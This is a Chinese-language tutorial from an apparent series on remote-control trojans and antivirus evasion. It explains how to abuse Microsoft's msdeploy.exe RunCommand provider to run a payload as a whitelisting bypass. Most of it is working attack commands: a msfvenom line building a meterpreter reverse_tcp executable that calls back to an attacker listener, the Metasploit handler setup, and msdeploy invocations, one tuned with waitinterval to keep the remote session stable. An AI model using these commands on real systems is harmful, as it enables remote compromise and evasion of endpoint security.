远控免杀专题(51)-白名单msdeloy.exe执行payload

wholesome

一、msdeloy.exe介绍

msdeploy.exe是微软提供的web部署命令行工具，通过它可以方便的部署web应用、数据库等，路径在C:\Program Files\IIS\Microsoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或远程同步，打包和部署Web应用程序，网站或Web服务器内容和配置。它具有众多功能，这些功能可以高度精确地包括要处理的那些组件，并排除那些不需要的组件。为了能够使用Web Deploy，必须已在源计算机和目标计算机上安装IIS。
msdeloy的命令参数繁杂，想要通过msdelopy来执行payload我们需要了解以下的几个参数：

1. -verb:<verbName>：指定Web Deploy动作即需要对源对象或目标对象执行的操作。<verbName>必须为以下之一：delete，dump，getDependencies，getSystemInfo或sync。sync即synchronize（同步操作），需要指定源对象和目标对象。

复制代码

1. -source:<provider>：指定动作参数的数据源。source是同步和转储操作的必需参数，但不是delete操作的必备参数。可以使用msdeploy.exe -source -help命令查看关于source参数帮助，其中有一RunCommand参数可以在调用同步时在目标运行命令。

复制代码

1. -dest: <provider>：指定sync/delete操作的目的地。仅当指定了sync或delete动词时，-dest参数才是必需的。-dest参数所使用的<provider>程序、其路径和设置是与-source参数是一致的。

复制代码

二、msdeloy.exe执行payload

通过执行.exe文件执行payload，生成.exe木马文件的方式有很多种在实战中可以选择免杀效果较好的。为了方便演示直接使用msf生成的木马文件：

1. msfvenom -f exe -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > w_re.exe

复制代码

msf监听：​​​​​​​

1. use exploit/multi/handler
   
2. set payload windows/meterpreter/reverse_tcp
   
3. set lhost 192.168.19.146
   
4. set lport 23333
   
5. exploit

复制代码

​
复制文件到本地使用msdeploy执行：

1. msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe"

复制代码

不添加执行重试间隔时间的情况下，该进程建立之后会中断重试，得到会话存活时间很短。
​
​
使用waitinterval参数指定较长的程序重试时间间隔，以得到稳定会话。

1. msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe",waitinterval=15000000

复制代码

​
开启火绒和360的情况下会报警并清除木马文件：
​
使用virustotal.com检查：由于使用msfvenom原生木马，查杀率相当感人：
​

三、参考资料

lolbas-msdploy:https://lolbas-project.github.io ... eploy/#awl%20bypass
微软mesdploy文档：https://docs.microsoft.com/en-us ... 9740%28v%3dws.10%29
msdeploy-runcommand参数文档：https://docs.microsoft.com/en-us ... 9740%28v%3dws.10%29